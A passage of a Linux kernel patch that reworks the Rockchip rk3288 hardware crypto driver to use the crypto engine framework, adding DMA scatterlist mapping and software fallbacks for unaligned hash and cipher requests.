+ static irqreturn_t rk_crypto_irq_handle(int irq, void *dev_id)
+ {
+ 	struct rk_crypto_info *dev  = platform_get_drvdata(dev_id);
+ 	u32 interrupt_status;
+ 
+-	spin_lock(&dev->lock);
+ 	interrupt_status = CRYPTO_READ(dev, RK_CRYPTO_INTSTS);
+ 	CRYPTO_WRITE(dev, RK_CRYPTO_INTSTS, interrupt_status);
+ 
++	dev->status = 1;
+ 	if (interrupt_status & 0x0a) {
+ 		dev_warn(dev->dev, "DMA Error\n");
+-		dev->err = -EFAULT;
++		dev->status = 0;
+ 	}
+-	tasklet_schedule(&dev->done_task);
++	complete(&dev->complete);
+ 
+-	spin_unlock(&dev->lock);
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int rk_crypto_enqueue(struct rk_crypto_info *dev,
+-			      struct crypto_async_request *async_req)
+-{
+-	unsigned long flags;
+-	int ret;
+-
+-	spin_lock_irqsave(&dev->lock, flags);
+-	ret = crypto_enqueue_request(&dev->queue, async_req);
+-	if (dev->busy) {
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		return ret;
+-	}
+-	dev->busy = true;
+-	spin_unlock_irqrestore(&dev->lock, flags);
+-	tasklet_schedule(&dev->queue_task);
+-
+-	return ret;
+-}
+-
+-static void rk_crypto_queue_task_cb(unsigned long data)
+-{
+-	struct rk_crypto_info *dev = (struct rk_crypto_info *)data;
+-	struct crypto_async_request *async_req, *backlog;
+-	unsigned long flags;
+-	int err = 0;
+-
+-	dev->err = 0;
+-	spin_lock_irqsave(&dev->lock, flags);
+-	backlog   = crypto_get_backlog(&dev->queue);
+-	async_req = crypto_dequeue_request(&dev->queue);
+-
+-	if (!async_req) {
+-		dev->busy = false;
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		return;
+-	}
+-	spin_unlock_irqrestore(&dev->lock, flags);
+-
+-	if (backlog) {
+-		backlog->complete(backlog, -EINPROGRESS);
+-		backlog = NULL;
+-	}
+-
+-	dev->async_req = async_req;
+-	err = dev->start(dev);
+-	if (err)
+-		dev->complete(dev->async_req, err);
+-}
+-
+-static void rk_crypto_done_task_cb(unsigned long data)
+-{
+-	struct rk_crypto_info *dev = (struct rk_crypto_info *)data;
+-
+-	if (dev->err) {
+-		dev->complete(dev->async_req, dev->err);
+-		return;
+-	}
+-
+-	dev->err = dev->update(dev);
+-	if (dev->err)
+-		dev->complete(dev->async_req, dev->err);
+-}
+-
+ static struct rk_crypto_tmp *rk_cipher_algs[] = {
+ 	&rk_ecb_aes_alg,
+ 	&rk_cbc_aes_alg,
+@@ -337,8 +175,6 @@ static int rk_crypto_probe(struct platform_device *pdev)
+ 	if (err)
+ 		goto err_crypto;
+ 
+-	spin_lock_init(&crypto_info->lock);
+-
+ 	crypto_info->reg = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(crypto_info->reg)) {
+ 		err = PTR_ERR(crypto_info->reg);
+@@ -389,18 +225,11 @@ static int rk_crypto_probe(struct platform_device *pdev)
+ 	crypto_info->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, crypto_info);
+ 
+-	tasklet_init(&crypto_info->queue_task,
+-		     rk_crypto_queue_task_cb, (unsigned long)crypto_info);
+-	tasklet_init(&crypto_info->done_task,
+-		     rk_crypto_done_task_cb, (unsigned long)crypto_info);
+-	crypto_init_queue(&crypto_info->queue, 50);
++	crypto_info->engine = crypto_engine_alloc_init(&pdev->dev, true);
++	crypto_engine_start(crypto_info->engine);
++	init_completion(&crypto_info->complete);
+ 
+-	crypto_info->enable_clk = rk_crypto_enable_clk;
+-	crypto_info->disable_clk = rk_crypto_disable_clk;
+-	crypto_info->load_data = rk_load_data;
+-	crypto_info->unload_data = rk_unload_data;
+-	crypto_info->enqueue = rk_crypto_enqueue;
+-	crypto_info->busy = false;
++	rk_crypto_enable_clk(crypto_info);
+ 
+ 	err = rk_crypto_register(crypto_info);
+ 	if (err) {
+@@ -412,9 +241,9 @@ static int rk_crypto_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_register_alg:
+-	tasklet_kill(&crypto_info->queue_task);
+-	tasklet_kill(&crypto_info->done_task);
++	crypto_engine_exit(crypto_info->engine);
+ err_crypto:
++	dev_err(dev, "Crypto Accelerator not successfully registered\n");
+ 	return err;
+ }
+ 
+@@ -423,8 +252,8 @@ static int rk_crypto_remove(struct platform_device *pdev)
+ 	struct rk_crypto_info *crypto_tmp = platform_get_drvdata(pdev);
+ 
+ 	rk_crypto_unregister();
+-	tasklet_kill(&crypto_tmp->done_task);
+-	tasklet_kill(&crypto_tmp->queue_task);
++	rk_crypto_disable_clk(crypto_tmp);
++	crypto_engine_exit(crypto_tmp->engine);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/crypto/rockchip/rk3288_crypto.h b/drivers/crypto/rockchip/rk3288_crypto.h
+index 97278c2574ff9..045e811b4af84 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto.h
++++ b/drivers/crypto/rockchip/rk3288_crypto.h
+@@ -5,9 +5,11 @@
+ #include <crypto/aes.h>
+ #include <crypto/internal/des.h>
+ #include <crypto/algapi.h>
++#include <linux/dma-mapping.h>
+ #include <linux/interrupt.h>
+ #include <linux/delay.h>
+ #include <linux/scatterlist.h>
++#include <crypto/engine.h>
+ #include <crypto/internal/hash.h>
+ #include <crypto/internal/skcipher.h>
+ 
+@@ -193,45 +195,15 @@ struct rk_crypto_info {
+ 	struct reset_control		*rst;
+ 	void __iomem			*reg;
+ 	int				irq;
+-	struct crypto_queue		queue;
+-	struct tasklet_struct		queue_task;
+-	struct tasklet_struct		done_task;
+-	struct crypto_async_request	*async_req;
+-	int 				err;
+-	/* device lock */
+-	spinlock_t			lock;
+-
+-	/* the public variable */
+-	struct scatterlist		*sg_src;
+-	struct scatterlist		*sg_dst;
+-	struct scatterlist		sg_tmp;
+-	struct scatterlist		*first;
+-	unsigned int			left_bytes;
+-	void				*addr_vir;
+-	int				aligned;
+-	int				align_size;
+-	size_t				src_nents;
+-	size_t				dst_nents;
+-	unsigned int			total;
+-	unsigned int			count;
+-	dma_addr_t			addr_in;
+-	dma_addr_t			addr_out;
+-	bool				busy;
+-	int (*start)(struct rk_crypto_info *dev);
+-	int (*update)(struct rk_crypto_info *dev);
+-	void (*complete)(struct crypto_async_request *base, int err);
+-	int (*enable_clk)(struct rk_crypto_info *dev);
+-	void (*disable_clk)(struct rk_crypto_info *dev);
+-	int (*load_data)(struct rk_crypto_info *dev,
+-			 struct scatterlist *sg_src,
+-			 struct scatterlist *sg_dst);
+-	void (*unload_data)(struct rk_crypto_info *dev);
+-	int (*enqueue)(struct rk_crypto_info *dev,
+-		       struct crypto_async_request *async_req);
++
++	struct crypto_engine *engine;
++	struct completion complete;
++	int status;
+ };
+ 
+ /* the private variable of hash */
+ struct rk_ahash_ctx {
++	struct crypto_engine_ctx enginectx;
+ 	struct rk_crypto_info		*dev;
+ 	/* for fallback */
+ 	struct crypto_ahash		*fallback_tfm;
+@@ -241,14 +213,23 @@ struct rk_ahash_ctx {
+ struct rk_ahash_rctx {
+ 	struct ahash_request		fallback_req;
+ 	u32				mode;
++	int nrsg;
+ };
+ 
+ /* the private variable of cipher */
+ struct rk_cipher_ctx {
++	struct crypto_engine_ctx enginectx;
+ 	struct rk_crypto_info		*dev;
+ 	unsigned int			keylen;
+-	u32				mode;
++	u8				key[AES_MAX_KEY_SIZE];
+ 	u8				iv[AES_BLOCK_SIZE];
++	struct crypto_skcipher *fallback_tfm;
++};
++
++struct rk_cipher_rctx {
++	u8 backup_iv[AES_BLOCK_SIZE];
++	u32				mode;
++	struct skcipher_request fallback_req;   // keep at the end
+ };
+ 
+ enum alg_type {
+diff --git a/drivers/crypto/rockchip/rk3288_crypto_ahash.c b/drivers/crypto/rockchip/rk3288_crypto_ahash.c
+index ed03058497bc2..edd40e16a3f0a 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto_ahash.c
++++ b/drivers/crypto/rockchip/rk3288_crypto_ahash.c
+@@ -9,6 +9,7 @@
+  * Some ideas are from marvell/cesa.c and s5p-sss.c driver.
+  */
+ #include <linux/device.h>
++#include <asm/unaligned.h>
+ #include "rk3288_crypto.h"
+ 
+ /*
+@@ -16,6 +17,40 @@
+  * so we put the fixed hash out when met zero message.
+  */
+ 
++static bool rk_ahash_need_fallback(struct ahash_request *req)
++{
++	struct scatterlist *sg;
++
++	sg = req->src;
++	while (sg) {
++		if (!IS_ALIGNED(sg->offset, sizeof(u32))) {
++			return true;
++		}
++		if (sg->length % 4) {
++			return true;
++		}
++		sg = sg_next(sg);
++	}
++	return false;
++}
++
++static int rk_ahash_digest_fb(struct ahash_request *areq)
++{
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_ctx *tfmctx = crypto_ahash_ctx(tfm);
++
++	ahash_request_set_tfm(&rctx->fallback_req, tfmctx->fallback_tfm);
++	rctx->fallback_req.base.flags = areq->base.flags &
++					CRYPTO_TFM_REQ_MAY_SLEEP;
++
++	rctx->fallback_req.nbytes = areq->nbytes;
++	rctx->fallback_req.src = areq->src;
++	rctx->fallback_req.result = areq->result;
++
++	return crypto_ahash_digest(&rctx->fallback_req);
++}
++
+ static int zero_message_process(struct ahash_request *req)
+ {
+ 	struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
+@@ -38,16 +73,12 @@ static int zero_message_process(struct ahash_request *req)
+ 	return 0;
+ }
+ 
+-static void rk_ahash_crypto_complete(struct crypto_async_request *base, int err)
+-{
+-	if (base->complete)
+-		base->complete(base, err);
+-}
+-
+-static void rk_ahash_reg_init(struct rk_crypto_info *dev)
++static void rk_ahash_reg_init(struct ahash_request *req)
+ {
+-	struct ahash_request *req = ahash_request_cast(dev->async_req);
+ 	struct rk_ahash_rctx *rctx = ahash_request_ctx(req);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
++	struct rk_crypto_info *dev = tctx->dev;
+ 	int reg_status;
+ 
+ 	reg_status = CRYPTO_READ(dev, RK_CRYPTO_CTRL) |
+@@ -74,7 +105,7 @@ static void rk_ahash_reg_init(struct rk_crypto_info *dev)
+ 					  RK_CRYPTO_BYTESWAP_BRFIFO |
+ 					  RK_CRYPTO_BYTESWAP_BTFIFO);
+ 
+-	CRYPTO_WRITE(dev, RK_CRYPTO_HASH_MSG_LEN, dev->total);
++	CRYPTO_WRITE(dev, RK_CRYPTO_HASH_MSG_LEN, req->nbytes);
+ }
+ 
+ static int rk_ahash_init(struct ahash_request *req)
+@@ -167,48 +198,64 @@ static int rk_ahash_digest(struct ahash_request *req)
+ 	struct rk_ahash_ctx *tctx = crypto_tfm_ctx(req->base.tfm);
+ 	struct rk_crypto_info *dev = tctx->dev;
+ 
++	if (rk_ahash_need_fallback(req))
++		return rk_ahash_digest_fb(req);
++
+ 	if (!req->nbytes)
+ 		return zero_message_process(req);
+-	else
+-		return dev->enqueue(dev, &req->base);
++
++	return crypto_transfer_hash_request_to_engine(dev->engine, req);
+ }
+ 
+-static void crypto_ahash_dma_start(struct rk_crypto_info *dev)
++static void crypto_ahash_dma_start(struct rk_crypto_info *dev, struct scatterlist *sg)
+ {
+-	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAS, dev->addr_in);
+-	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAL, (dev->count + 3) / 4);
++	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAS, sg_dma_address(sg));
++	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAL, sg_dma_len(sg) / 4);
+ 	CRYPTO_WRITE(dev, RK_CRYPTO_CTRL, RK_CRYPTO_HASH_START |
+ 					  (RK_CRYPTO_HASH_START << 16));
+ }
+ 
+-static int rk_ahash_set_data_start(struct rk_crypto_info *dev)
++static int rk_hash_prepare(struct crypto_engine *engine, void *breq)
++{
++	struct ahash_request *areq = container_of(breq, struct ahash_request, base);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
++	int ret;
++
++	ret = dma_map_sg(tctx->dev->dev, areq->src, sg_nents(areq->src), DMA_TO_DEVICE);
++	if (ret <= 0)
++		return -EINVAL;
++
++	rctx->nrsg = ret;
++
++	return 0;
++}
++
++static int rk_hash_unprepare(struct crypto_engine *engine, void *breq)
+ {
+-	int err;
++	struct ahash_request *areq = container_of(breq, struct ahash_request, base);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
+ 
+-	err = dev->load_data(dev, dev->sg_src, NULL);
+-	if (!err)
+-		crypto_ahash_dma_start(dev);
+-	return err;
++	dma_unmap_sg(tctx->dev->dev, areq->src, rctx->nrsg, DMA_TO_DEVICE);
++	return 0;
+ }
+ 
+-static int rk_ahash_start(struct rk_crypto_info *dev)
++static int rk_hash_run(struct crypto_engine *engine, void *breq)
+ {
+-	struct ahash_request *req = ahash_request_cast(dev->async_req);
+-	struct crypto_ahash *tfm;
+-	struct rk_ahash_rctx *rctx;
+-
+-	dev->total = req->nbytes;
+-	dev->left_bytes = req->nbytes;
+-	dev->aligned = 0;
+-	dev->align_size = 4;
+-	dev->sg_dst = NULL;
+-	dev->sg_src = req->src;
+-	dev->first = req->src;
+-	dev->src_nents = sg_nents(req->src);
+-	rctx = ahash_request_ctx(req);
++	struct ahash_request *areq = container_of(breq, struct ahash_request, base);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
++	struct scatterlist *sg = areq->src;
++	int err = 0;
++	int i;
++	u32 v;
++
+ 	rctx->mode = 0;
+ 
+-	tfm = crypto_ahash_reqtfm(req);
+ 	switch (crypto_ahash_digestsize(tfm)) {
+ 	case SHA1_DIGEST_SIZE:
+ 		rctx->mode = RK_CRYPTO_HASH_SHA1;
+@@ -220,32 +267,26 @@ static int rk_ahash_start(struct rk_crypto_info *dev)
+ 		rctx->mode = RK_CRYPTO_HASH_MD5;
+ 		break;
+ 	default:
+-		return -EINVAL;
++		err =  -EINVAL;
++		goto theend;
+ 	}
+ 
+-	rk_ahash_reg_init(dev);
+-	return rk_ahash_set_data_start(dev);
+-}
+-
+-static int rk_ahash_crypto_rx(struct rk_crypto_info *dev)
+-{
+-	int err = 0;
+-	struct ahash_request *req = ahash_request_cast(dev->async_req);
+-	struct crypto_ahash *tfm;
+-
+-	dev->unload_data(dev);
+-	if (dev->left_bytes) {
+-		if (dev->aligned) {
+-			if (sg_is_last(dev->sg_src)) {
+-				dev_warn(dev->dev, "[%s:%d], Lack of data\n",
+-					 __func__, __LINE__);
+-				err = -ENOMEM;
+-				goto out_rx;
+-			}
+-			dev->sg_src = sg_next(dev->sg_src);
++	rk_ahash_reg_init(areq);
++
++	while (sg) {
++		reinit_completion(&tctx->dev->complete);
++		tctx->dev->status = 0;
++		crypto_ahash_dma_start(tctx->dev, sg);
++		wait_for_completion_interruptible_timeout(&tctx->dev->complete,
++							  msecs_to_jiffies(2000));
++		if (!tctx->dev->status) {
++			dev_err(tctx->dev->dev, "DMA timeout\n");
++			err = -EFAULT;
++			goto theend;
+ 		}
+-		err = rk_ahash_set_data_start(dev);
+-	} else {
++		sg = sg_next(sg);
++	}
++
+ 		/*
+ 		 * it will take some time to process date after last dma
+ 		 * transmission.
+@@ -256,18 +297,20 @@ static int rk_ahash_crypto_rx(struct rk_crypto_info *dev)
+ 		 * efficiency, and make it response quickly when dma
+ 		 * complete.
+ 		 */
+-		while (!CRYPTO_READ(dev, RK_CRYPTO_HASH_STS))
+-			udelay(10);
+-
+-		tfm = crypto_ahash_reqtfm(req);
+-		memcpy_fromio(req->result, dev->reg + RK_CRYPTO_HASH_DOUT_0,
+-			      crypto_ahash_digestsize(tfm));
+-		dev->complete(dev->async_req, 0);
+-		tasklet_schedule(&dev->queue_task);
++	while (!CRYPTO_READ(tctx->dev, RK_CRYPTO_HASH_STS))
++		udelay(10);
++
++	for (i = 0; i < crypto_ahash_digestsize(tfm) / 4; i++) {
++		v = readl(tctx->dev->reg + RK_CRYPTO_HASH_DOUT_0 + i * 4);
++		put_unaligned_le32(v, areq->result + i * 4);
+ 	}
+ 
+-out_rx:
+-	return err;
++theend:
++	local_bh_disable();
++	crypto_finalize_hash_request(engine, breq, err);
++	local_bh_enable();
++
++	return 0;
+ }
+ 
+ static int rk_cra_hash_init(struct crypto_tfm *tfm)
+@@ -281,14 +324,6 @@ static int rk_cra_hash_init(struct crypto_tfm *tfm)
+ 	algt = container_of(alg, struct rk_crypto_tmp, alg.hash);
+ 
+ 	tctx->dev = algt->dev;
+-	tctx->dev->addr_vir = (void *)__get_free_page(GFP_KERNEL);
+-	if (!tctx->dev->addr_vir) {
+-		dev_err(tctx->dev->dev, "failed to kmalloc for addr_vir\n");
+-		return -ENOMEM;
+-	}
+-	tctx->dev->start = rk_ahash_start;
+-	tctx->dev->update = rk_ahash_crypto_rx;
+-	tctx->dev->complete = rk_ahash_crypto_complete;
+ 
+ 	/* for fallback */
+ 	tctx->fallback_tfm = crypto_alloc_ahash(alg_name, 0,
+@@ -297,19 +332,23 @@ static int rk_cra_hash_init(struct crypto_tfm *tfm)
+ 		dev_err(tctx->dev->dev, "Could not load fallback driver.\n");
+ 		return PTR_ERR(tctx->fallback_tfm);
+ 	}
++
+ 	crypto_ahash_set_reqsize(__crypto_ahash_cast(tfm),
+ 				 sizeof(struct rk_ahash_rctx) +
+ 				 crypto_ahash_reqsize(tctx->fallback_tfm));
+ 
+-	return tctx->dev->enable_clk(tctx->dev);
++	tctx->enginectx.op.do_one_request = rk_hash_run;
++	tctx->enginectx.op.prepare_request = rk_hash_prepare;
++	tctx->enginectx.op.unprepare_request = rk_hash_unprepare;
++
++	return 0;
+ }
+ 
+ static void rk_cra_hash_exit(struct crypto_tfm *tfm)
+ {
+ 	struct rk_ahash_ctx *tctx = crypto_tfm_ctx(tfm);
+ 
+-	free_page((unsigned long)tctx->dev->addr_vir);
+-	return tctx->dev->disable_clk(tctx->dev);
++	crypto_free_ahash(tctx->fallback_tfm);
+ }
+ 
+ struct rk_crypto_tmp rk_ahash_sha1 = {
+diff --git a/drivers/crypto/rockchip/rk3288_crypto_skcipher.c b/drivers/crypto/rockchip/rk3288_crypto_skcipher.c
+index 5bbf0d2722e11..67a7e05d5ae31 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto_skcipher.c
++++ b/drivers/crypto/rockchip/rk3288_crypto_skcipher.c
+@@ -9,23 +9,77 @@
+  * Some ideas are from marvell-cesa.c and s5p-sss.c driver.
+  */
+ #include <linux/device.h>
++#include <crypto/scatterwalk.h>
+ #include "rk3288_crypto.h"
+ 
+ #define RK_CRYPTO_DEC			BIT(0)
+ 
+-static void rk_crypto_complete(struct crypto_async_request *base, int err)
++static int rk_cipher_need_fallback(struct skcipher_request *req)
+ {
+-	if (base->complete)
+-		base->complete(base, err);
++	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
++	unsigned int bs = crypto_skcipher_blocksize(tfm);
++	struct scatterlist *sgs, *sgd;
++	unsigned int stodo, dtodo, len;
++
++	if (!req->cryptlen)
++		return true;
++
++	len = req->cryptlen;
++	sgs = req->src;
++	sgd = req->dst;
++	while (sgs && sgd) {
++		if (!IS_ALIGNED(sgs->offset, sizeof(u32))) {
++			return true;
++		}
++		if (!IS_ALIGNED(sgd->offset, sizeof(u32))) {
++			return true;
++		}
++		stodo = min(len, sgs->length);
++		if (stodo % bs) {
++			return true;
++		}
++		dtodo = min(len, sgd->length);
++		if (dtodo % bs) {
++			return true;
++		}
++		if (stodo != dtodo) {
++			return true;
++		}
++		len -= stodo;
++		sgs = sg_next(sgs);
++		sgd = sg_next(sgd);
++	}
++	return false;
++}
++
++static int rk_cipher_fallback(struct skcipher_request *areq)
++{
++	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(areq);
++	struct rk_cipher_ctx *op = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(areq);
++	int err;
++
++	skcipher_request_set_tfm(&rctx->fallback_req, op->fallback_tfm);
++	skcipher_request_set_callback(&rctx->fallback_req, areq->base.flags,
++				      areq->base.complete, areq->base.data);
++	skcipher_request_set_crypt(&rctx->fallback_req, areq->src, areq->dst,
++				   areq->cryptlen, areq->iv);
++	if (rctx->mode & RK_CRYPTO_DEC)
++		err = crypto_skcipher_decrypt(&rctx->fallback_req);
++	else
++		err = crypto_skcipher_encrypt(&rctx->fallback_req);
++	return err;
+ }
+ 
+ static int rk_handle_req(struct rk_crypto_info *dev,
+ 			 struct skcipher_request *req)
+ {
+-	if (!IS_ALIGNED(req->cryptlen, dev->align_size))
+-		return -EINVAL;
+-	else
+-		return dev->enqueue(dev, &req->base);
++	struct crypto_engine *engine = dev->engine;
++
++	if (rk_cipher_need_fallback(req))
++		return rk_cipher_fallback(req);
++
++	return crypto_transfer_skcipher_request_to_engine(engine, req);
+ }
+ 
+ static int rk_aes_setkey(struct crypto_skcipher *cipher,
+@@ -38,8 +92,9 @@ static int rk_aes_setkey(struct crypto_skcipher *cipher,
+ 	    keylen != AES_KEYSIZE_256)
+ 		return -EINVAL;
+ 	ctx->keylen = keylen;
+-	memcpy_toio(ctx->dev->reg + RK_CRYPTO_AES_KEY_0, key, keylen);
+-	return 0;
++	memcpy(ctx->key, key, keylen);
++
++	return crypto_skcipher_setkey(ctx->fallback_tfm, key, keylen);
+ }
+ 
+ static int rk_des_setkey(struct crypto_skcipher *cipher,
+@@ -53,8 +108,9 @@ static int rk_des_setkey(struct crypto_skcipher *cipher,
+ 		return err;
+ 
+ 	ctx->keylen = keylen;
+-	memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_KEY1_0, key, keylen);
+-	return 0;
++	memcpy(ctx->key, key, keylen);
++
++	return crypto_skcipher_setkey(ctx->fallback_tfm, key, keylen);
+ }
+ 
+ static int rk_tdes_setkey(struct crypto_skcipher *cipher,
+@@ -68,17 +124,19 @@ static int rk_tdes_setkey(struct crypto_skcipher *cipher,
+ 		return err;
+ 
+ 	ctx->keylen = keylen;
+-	memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_KEY1_0, key, keylen);
+-	return 0;
++	memcpy(ctx->key, key, keylen);
++
++	return crypto_skcipher_setkey(ctx->fallback_tfm, key, keylen);
+ }
+ 
+ static int rk_aes_ecb_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_ECB_MODE;
++	rctx->mode = RK_CRYPTO_AES_ECB_MODE;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -86,9 +144,10 @@ static int rk_aes_ecb_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_ECB_MODE | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_AES_ECB_MODE | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -96,9 +155,10 @@ static int rk_aes_cbc_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_CBC_MODE;
++	rctx->mode = RK_CRYPTO_AES_CBC_MODE;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -106,9 +166,10 @@ static int rk_aes_cbc_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_CBC_MODE | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_AES_CBC_MODE | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -116,9 +177,10 @@ static int rk_des_ecb_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = 0;
++	rctx->mode = 0;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -126,9 +188,10 @@ static int rk_des_ecb_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -136,9 +199,10 @@ static int rk_des_cbc_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC;
++	rctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -146,9 +210,10 @@ static int rk_des_cbc_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -156,9 +221,10 @@ static int rk_des3_ede_ecb_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT;
++	rctx->mode = RK_CRYPTO_TDES_SELECT;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -166,9 +232,10 @@ static int rk_des3_ede_ecb_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -176,9 +243,10 @@ static int rk_des3_ede_cbc_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC;
++	rctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -186,43 +254,42 @@ static int rk_des3_ede_cbc_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC |
++	rctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC |
+ 		    RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
